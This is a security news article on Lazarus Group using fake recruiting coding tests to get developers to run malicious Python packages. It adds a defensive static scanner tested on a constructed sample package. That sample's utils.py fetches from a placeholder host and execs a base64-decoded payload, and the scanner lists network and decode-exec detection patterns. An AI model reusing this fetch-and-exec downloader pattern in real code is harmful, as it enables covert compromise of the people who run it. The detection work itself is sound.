Network Security, Malware, DevSecOps

Lazarus Group tricks developers into loading malware via fake recruiting tests


New malicious software packages tied to the North Korean Lazarus Group were observed posing as a Python coding skills test for developers seeking a new job at Capital One, but were tracked to GitHub projects with embedded malware.

Researchers at ReversingLabs explained in a Sept. 10 blog post that the scheme was a follow-on to the VMConnect campaign that they first identified in August 2023 in which developers were lured into downloading malicious code via fake job interviews.

For this most recent campaign, the instructions sent by the threat actor set a timeframe for completing an assignment, which was to find a code flaw in the package and fix it. The researchers said the lure was clearly intended to create a sense of urgency for the job-seeker, making it more likely that they would download the malicious package.

Eric Schwake, director of cybersecurity strategy at Salt Security, said this attack takes advantage of developers' natural desire to demonstrate their skills. It uses the legitimate process of code reviews and assessments, making it difficult to detect.

“Downloading and running code is a fundamental part of a developer's workflow, making it harder to identify malicious activity among regular operations,” said Schwake. “Developers often have privileged access to source code, sensitive data, and production environments, so compromising a developer can lead to severe downstream consequences.”

Ngoc Bui, cybersecurity expert at Menlo Security, added that this infection chain aligns closely with North Korea’s typical tactics, techniques and procedures.

If security teams believe Lazarus poses a threat to their organization, Bui said adding a dedicated threat intelligence team to actively monitor the group's activity can give them a strategic advantage. While it may not prevent every attack, Bui said continuous tracking enables earlier detection and increases the team's chances of mitigating threats before they cause significant damage.

“Some previous attacks include the VMConnect campaign from 2023, linked to the Lazarus Group, where malicious PyPI packages were used to mimic legitimate tools,” said Bui. “Techniques such as using LinkedIn accounts posing as recruiters and malware delivery via CHM files were also previously observed. Overlapping TTPs also include the use of malicious Python packages, encoded downloader functions, and fake job interviews to lure developers into executing the malware.”
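The overlapping TTPs Bui lists, malicious Python packages carrying encoded downloader functions behind a fake interview assignment, are exactly what a developer can screen for before running a "take-home test". The scanner below is an added example written for this article; it is not code from ReversingLabs, SC Media or any of the quoted researchers. It uses only the standard library's `ast` module to flag `exec`/`eval` on decoded data, long encoded literals handed to a decoder, `__import__`, and network modules or fetch calls, and runs over a constructed sample package. The package layout, the `helper()` function, the payload (a harmless print statement encoded at runtime) and the `example.invalid` URL are all made up for the demonstration.

```python
import ast
import base64

# Patterns a reviewer would want surfaced before executing an unknown package.
EXEC_LIKE = {"exec", "eval", "compile"}
DECODERS = {"b64decode", "b32decode", "b16decode", "a85decode",
            "unhexlify", "fromhex", "decompress"}
NET_MODULES = {"urllib", "requests", "socket", "http", "ftplib"}
NET_CALLS = {"urlopen", "urlretrieve"}
LONG_LITERAL = 32  # encoded string literals at least this long are reported


def _dotted_name(node):
    """Best-effort dotted name for a call target (Name or Attribute chain)."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def _uses_decoder(node):
    """True if any call underneath `node` is one of the known decoding routines."""
    return any(
        isinstance(sub, ast.Call)
        and _dotted_name(sub.func).rsplit(".", 1)[-1] in DECODERS
        for sub in ast.walk(node)
    )


def scan_source(src, filename="<module>"):
    """Return findings ('file:line: [tag] detail') for one Python source file."""
    try:
        tree = ast.parse(src, filename)
    except SyntaxError as exc:
        return [f"{filename}:{exc.lineno or 0}: [parse] not valid Python, inspect by hand"]
    found = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            mods = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [node.module or ""]
        else:
            mods = []
        for mod in mods:
            if mod.split(".")[0] in NET_MODULES:
                found.append((node.lineno, f"[net] imports {mod}"))
        if not isinstance(node, ast.Call):
            continue
        short = _dotted_name(node.func).rsplit(".", 1)[-1]
        first = node.args[0] if node.args else None
        if short in EXEC_LIKE and first is not None and not isinstance(first, ast.Constant):
            how = "a decoded payload" if _uses_decoder(first) else "a dynamic argument"
            found.append((node.lineno, f"[exec] {short}() called with {how}"))
        elif short == "__import__":
            found.append((node.lineno, "[exec] __import__() used for dynamic loading"))
        elif short in NET_CALLS:
            found.append((node.lineno, f"[net] {short}() fetches remote content"))
        elif (short in DECODERS and isinstance(first, ast.Constant)
              and isinstance(first.value, (str, bytes)) and len(first.value) >= LONG_LITERAL):
            found.append((node.lineno,
                          f"[encoded] {short}() applied to a {len(first.value)}-char literal"))
    return [f"{filename}:{line}: {msg}" for line, msg in sorted(found)]


def scan_package(files):
    """Scan a mapping of {relative path: source text}; returns {path: findings}."""
    return {path: scan_source(src, path) for path, src in files.items()}


def is_suspicious(results):
    """Flag the package when any file executes decoded or dynamically built code."""
    return any("[exec]" in f for findings in results.values() for f in findings)


# Constructed sample "assignment" package (not a real campaign artifact): the payload
# is a print statement encoded at runtime and example.invalid is a reserved name.
_PAYLOAD = base64.b64encode(b'print("constructed sample payload")').decode()
SAMPLE_PACKAGE = {
    "test_task/__init__.py": "from .utils import helper\n",
    "test_task/clean.py": "def add(a, b):\n    return a + b\n",
    "test_task/utils.py": (
        "import base64\n"
        "import urllib.request\n"
        "\n"
        "def helper():\n"
        "    data = urllib.request.urlopen('https://example.invalid/stage').read()\n"
        f"    exec(base64.b64decode('{_PAYLOAD}'))\n"
    ),
}

if __name__ == "__main__":
    results = scan_package(SAMPLE_PACKAGE)
    for findings in results.values():
        for finding in findings:
            print(finding)
    print("verdict:", "SUSPICIOUS" if is_suspicious(results) else "no obvious red flags")
```

Run against a real download, feed `scan_package` the `.py` files of the unpacked archive (including `setup.py`, which runs on `pip install`) and treat any `[exec]` finding as a reason to stop and read the file rather than run it. The check is deliberately static: nothing in the package is imported or executed, which is the point of screening an untrusted "test" in the first place.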
